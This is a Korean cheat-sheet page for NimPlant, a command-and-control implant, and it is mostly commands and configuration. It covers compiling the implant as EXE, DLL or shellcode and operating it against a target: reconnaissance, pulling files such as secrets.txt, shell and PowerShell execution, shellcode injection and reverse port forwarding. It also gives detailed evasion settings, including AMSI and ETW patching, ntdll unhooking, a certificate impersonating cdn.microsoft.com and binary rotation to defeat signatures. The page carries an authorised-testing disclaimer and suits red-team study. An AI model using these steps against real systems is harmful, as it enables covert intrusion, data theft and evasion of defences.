콘텐츠로 이동
1337skills 1337skills - 치트시트

NimPlant

NimPlant는 Nim으로 작성된 경량 크로스 플랫폼 명령 및 제어(C2)임플란트입니다. HTTP/HTTPS 통신, 구성 가능한 슬립 간격, 파일 작업 및 쉘코드 실행 기능을 제공합니다.

면책 조항: 이 도구는 승인된 보안 테스트 및 레드팀 작전에만 사용됩니다. 소유하지 않았거나 테스트할 명시적 권한이 없는 시스템에 대한 무단 사용은 불법이며 비윤리적입니다. 공격적 보안 작업을 수행하기 전에 항상 서면 승인을 받으세요.

설치

Server Setup

# Clone the repository
git clone https://github.com/chvancooten/NimPlant.git
cd NimPlant

# Install Python dependencies for the server
pip install -r server/requirements.txt

# Install Nim (required for compiling implants)
# On Linux
curl https://nim-lang.org/choosenim/init.sh -sSf | sh

# Install Nim dependencies
nimble install -y winim nimcrypto zippy

Compile the Implant

# Edit configuration before compiling
nano config.toml
# config.toml - NimPlant configuration
[server]
ip = "0.0.0.0"
port = 443
registerPath = "/api/register"
taskPath = "/api/task"
resultPath = "/api/result"

[implant]
sleepTime = 10
sleepJitter = 20
killDate = "2026-12-31"
userAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
# Compile the implant (Windows EXE)
python3 NimPlant.py compile -o exe

# Compile as DLL
python3 NimPlant.py compile -o dll

# Compile as shellcode (via sRDI)
python3 NimPlant.py compile -o shellcode

# Cross-compile for Windows from Linux
python3 NimPlant.py compile -o exe --crosscompile

Server Operations

Starting the Server

# Start the NimPlant C2 server
python3 NimPlant.py server

# Server starts listening on configured port
# Web UI available at https://server-ip:port/

Managing Implants

# In the NimPlant server console:

# List active implants
nimplant> list

# Interact with a specific implant
nimplant> interact <implant-id>

# View implant details
nimplant> info

# Kill an implant
nimplant> kill

Commands

Reconnaissance

# Get system information
nimplant> whoami
nimplant> hostname
nimplant> ipconfig
nimplant> env

# List running processes
nimplant> ps

# Get current working directory
nimplant> pwd

# List directory contents
nimplant> ls C:\Users

File Operations

# Upload a file to the target
nimplant> upload /local/path/file.exe C:\Windows\Temp\file.exe

# Download a file from the target
nimplant> download C:\Users\target\Documents\secrets.txt

# Read a file
nimplant> cat C:\Users\target\Desktop\notes.txt

# Create a directory
nimplant> mkdir C:\Windows\Temp\workdir

# Remove a file
nimplant> rm C:\Windows\Temp\file.exe

# Copy a file
nimplant> cp C:\source\file.txt C:\dest\file.txt

# Move a file
nimplant> mv C:\old\file.txt C:\new\file.txt

Execution

# Execute a shell command
nimplant> shell net user

# Execute a command via cmd.exe
nimplant> cmd /c dir C:\

# Run PowerShell command
nimplant> powershell Get-Process

# Execute assembly in memory (inline-execute)
nimplant> inline-execute /path/to/assembly.exe arg1 arg2

# Execute shellcode
nimplant> shinject <pid> /path/to/shellcode.bin

네트워크 Operations

# List network connections
nimplant> netstat

# Reverse port forward
nimplant> rportfwd 8080 127.0.0.1 80

# Stop reverse port forward
nimplant> rportfwd stop 8080

Sleep and Communication

# Change sleep interval (seconds)
nimplant> sleep 30

# Change sleep jitter (percentage)
nimplant> jitter 40

# Combination: sleep 30 seconds with 40% jitter
nimplant> sleep 30
nimplant> jitter 40

HTTPS Communication

# Generate self-signed certificate for HTTPS
openssl req -x509 -newkey rsa:4096 -keyout server.key -out server.crt \
  -days 365 -nodes -subj "/CN=cdn.microsoft.com"

# Place certificates in the server directory
cp server.key server/
cp server.crt server/

OPSEC Considerations

# NimPlant OPSEC features:
# - Encrypted C2 communications (AES-256)
# - Configurable sleep with jitter to avoid beacon detection
# - Kill date to auto-terminate after engagement
# - User-agent customization to blend with normal traffic
# - Direct syscalls to avoid API hooking (optional)

# Recommended practices:
# 1. Use legitimate-looking domain with valid HTTPS certificate
# 2. Set appropriate sleep times (30-60s for stealth)
# 3. Use redirectors between implant and C2 server
# 4. Set a kill date matching the engagement window
# 5. Rotate implant binaries to avoid signature detection

Evasion Configuration

# Additional config.toml evasion options
[implant]
sleepTime = 60
sleepJitter = 30
killDate = "2026-06-30"
userAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"

[evasion]
patchAmsi = true
patchEtw = true
unhookNtdll = true

Logging

# Server logs all interactions
# Logs stored in: server/logs/

# View engagement log
cat server/logs/nimplant.log

# Each implant session has its own log
ls server/logs/sessions/

Cleanup

# Terminate all active implants
nimplant> killall

# Individual implant cleanup
nimplant> interact <id>
nimplant> kill

# Remove artifacts from target (via shell before killing)
nimplant> shell del C:\path\to\implant.exe
nimplant> kill